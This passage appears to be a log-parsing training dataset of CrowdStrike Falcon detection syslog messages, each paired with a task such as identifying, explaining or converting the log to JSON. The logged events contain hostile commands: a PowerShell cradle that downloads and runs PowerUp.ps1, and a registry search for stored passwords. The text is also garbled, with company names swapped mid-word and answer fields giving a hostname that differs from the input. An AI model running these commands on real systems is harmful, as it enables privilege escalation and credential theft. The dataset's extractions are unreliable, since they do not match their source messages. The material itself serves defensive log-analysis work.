"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "233.87.19.2",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=233.87.19.2 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: N/A
filename: powershell.exe
filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T16:44:43Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 233.87.19.2
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"alice","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf",
"filename": "reg.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-09T17:22:37Z\",\"template_instance_id\":\"9162\",\"behavior_id\":\"10250\",\"filename\":\"reg.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"reg query HKLM /f password /t REG_SZ /s\",\"scenario\":\"suspicious_activity\",\"objective\":\"Explore\",\"tactic\":\"Discovery\",\"tactic_id\":\"TA0007\",\"technique\":\"System Network Configuration Discovery\",\"technique_id\":\"T1016\",\"display_name\":\"ReconCommands2\",\"description\":\"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"ioc_source\":\"library_load\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"user_name\":\"alice\",\"user_id\":\"S-1-5-21-3008783154-4189408168-2363429128-1618\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280\",\"sha256\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"md5\":\"8a93acac33151793f8d52000071c0b06\",\"parent_details\":{\"parent_sha256\":\"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527\",\"parent_md5\":\"911d039e71583a07320b32bde22f8e22\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388\"},\"pattern_disposition\":2048,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mumbrellaine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":true,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-09T17:22:37Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "64.176.135.121",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"alice","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asumbrellaiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"alice","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mumbrellaine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=64.176.135.121 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=alice ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.umbrellaint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: 19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf
filename: reg.exe
filepath: \Device\HarddiskVolume1\Windows\System32\reg.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-09T17:22:37Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 64.176.135.121
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"fish","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf",
"filename": "reg.exe",
"filepath": "\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-09T17:22:37Z\",\"template_instance_id\":\"9162\",\"behavior_id\":\"10250\",\"filename\":\"reg.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"reg query HKLM /f password /t REG_SZ /s\",\"scenario\":\"suspicious_activity\",\"objective\":\"Explore\",\"tactic\":\"Discovery\",\"tactic_id\":\"TA0007\",\"technique\":\"System Network Configuration Discovery\",\"technique_id\":\"T1016\",\"display_name\":\"ReconCommands2\",\"description\":\"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"ioc_source\":\"library_load\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\reg.exe\",\"user_name\":\"fish\",\"user_id\":\"S-1-5-21-3008783154-4189408168-2363429128-1618\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280\",\"sha256\":\"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf\",\"md5\":\"8a93acac33151793f8d52000071c0b06\",\"parent_details\":{\"parent_sha256\":\"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527\",\"parent_md5\":\"911d039e71583a07320b32bde22f8e22\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388\"},\"pattern_disposition\":2048,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":true,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-09T17:22:37Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "156.27.51.231",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process tree.","severity":70,"confidence":80,"ioc_type":"hash_sha256","ioc_value":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","ioc_source":"library_load","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","user_name":"fish","user_id":"S-1-5-21-3008783154-4189408168-2363429128-1618","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:597003887738","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599750968280","sha256":"19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf","md5":"8a93acac33151793f8d52000071c0b06","parent_details":{"parent_sha256":"bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527","parent_md5":"911d039e71583a07320b32bde22f8e22","parent_cmdline":"\"C:\\Windows\\system32\\cmd.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:599747588388"},"pattern_disposition":2048,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":true,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=156.27.51.231 ::: fileHash=19316d4266d0b776d9b2a05d5903d8cbc8f0ea1520e9c2a7e6d5960b6fa4dcaf ::: fileName=reg.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\reg.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-09T17:22:37Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-09T17:22:37Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-09T17:22:37Z","template_instance_id":"9162","behavior_id":"10250","filename":"reg.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\reg.exe","alleged_filetype":"exe","cmdline":"reg query HKLM /f password /t REG_SZ /s","scenario":"suspicious_activity","objective":"Explore","tactic":"Discovery","tactic_id":"TA0007","technique":"System Network Configuration Discovery","technique_id":"T1016","display_name":"ReconCommands2","description":"A process tree contains characteristics often asoscorpiated with an adversary performing reconnaissance. This might be related to expected administrator activity. If this is unexpected, review the process 